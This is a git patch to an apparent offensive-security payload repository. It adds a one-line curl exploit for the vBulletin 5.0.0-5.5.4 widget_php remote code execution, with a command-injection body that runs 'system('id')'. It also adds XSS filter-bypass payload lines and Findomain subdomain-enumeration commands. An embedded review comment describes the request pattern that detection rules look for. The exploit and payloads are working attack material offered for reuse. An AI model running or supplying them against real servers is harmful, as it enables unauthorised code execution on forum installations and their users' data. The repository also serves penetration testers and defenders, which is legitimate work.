From 3221197b1ef9328ece13fc1d5e4369e04faa5f83 Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Thu, 26 Sep 2019 20:41:01 +0200
Subject: [PATCH] RCE vBulletin + findomain

---
 CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh | 1 +
 Insecure Deserialization/README.md | 3 ++-
 Methodology and Resources/Subdomains Enumeration.md | 12 ++++++++++++
 XSS Injection/README.md | 2 ++
 4 files changed, 17 insertions(+), 1 deletion(-)
 create mode 100644 CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh

diff --git a/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh b/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh
new file mode 100644
index 0000000..3ebf64a
--- /dev/null
+++ b/CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh
@@ -0,0 +1 @@
+curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;"
\ No newline at end of file
diff --git a/Insecure Deserialization/README.md b/Insecure Deserialization/README.md
index 4a0ed0f..aa05825 100644
--- a/Insecure Deserialization/README.md
+++ b/Insecure Deserialization/README.md
@@ -24,4 +24,5 @@ Check the following sub-sections, located in other files :
 * [Java Deserialization in manager.paypal.com](http://artsploit.blogspot.hk/2016/01/paypal-rce.html) by Michael Stepankin
 * [Instagram's Million Dollar Bug](http://www.exfiltrated.com/research-Instagram-RCE.php) by Wesley Wineberg
 * [(Ruby Cookie Deserialization RCE on facebooksearch.algolia.com](https://hackerone.com/reports/134321) by Michiel Prins (michiel)
-* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals
\ No newline at end of file
+* [Java deserialization](https://seanmelia.wordpress.com/2016/07/22/exploiting-java-deserialization-via-jboss/) by meals
+* [Diving into unserialize() - Sep 19- Vickie Li](https://medium.com/swlh/diving-into-unserialize-3586c1ec97e)
\ No newline at end of file
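Review bot: The new script in `CVE Exploits/vBulletin RCE 5.0.0 - 5.5.4.sh` has no shebang and no header comment, so nothing in the file states which advisory it reproduces, that `example.com` is a placeholder, or that `-k` disables TLS certificate verification; it also ends without a trailing newline, as the `\ No newline at end of file` marker shows. I would prepend `#!/usr/bin/env bash` and a comment along the lines of `# PoC for the vBulletin 5.0.0-5.5.4 widget_php code injection (<CVE id from the advisory>); -k skips TLS certificate checks`. From the detection side, the distinctive request shape — `routestring=ajax/render/widget_php` in the query string together with a `widgetConfig[code]` body parameter — is what web-server log queries and WAF rules key on, and a one-line comment recording that would make the file useful to defenders as well as for reproduction.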
diff --git a/Methodology and Resources/Subdomains Enumeration.md b/Methodology and Resources/Subdomains Enumeration.md
index 0806a99..88ee0e2 100644
--- a/Methodology and Resources/Subdomains Enumeration.md
+++ b/Methodology and Resources/Subdomains Enumeration.md
@@ -9,6 +9,7 @@
 * EyeWitness
 * Sublist3r
 * Subfinder
+ * Findomain
 * Aquatone (Ruby and Go versions)
 * AltDNS
 * MassDNS
@@ -86,6 +87,17 @@ go get github.com/subfinder/subfinder
 ./Subfinder/subfinder -d example.com -o /tmp/results_subfinder.txt
 ```
 
+### Using Findomain
+
+```powershell
+$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux
+$ chmod +x findomain-linux
+$ findomain_spyse_token="YourAccessToken"
+$ findomain_virustotal_token="YourAccessToken"
+$ findomain_fb_token="YourAccessToken"
+$ ./findomain-linux -t example.com -o
+```
+
 ### Using Aquatone - old version (Ruby)
 
 ```powershell
diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 6bd8aa1..a0ccd8a 100644
--- a/XSS Injection/README.md
+++ b/XSS Injection/README.md
@@ -751,6 +751,8 @@ You don't need to close your tags.
 
 ```javascript
 %26%2397;lert(1)
+alert
+>
 ```
 
 ### Bypass using Katana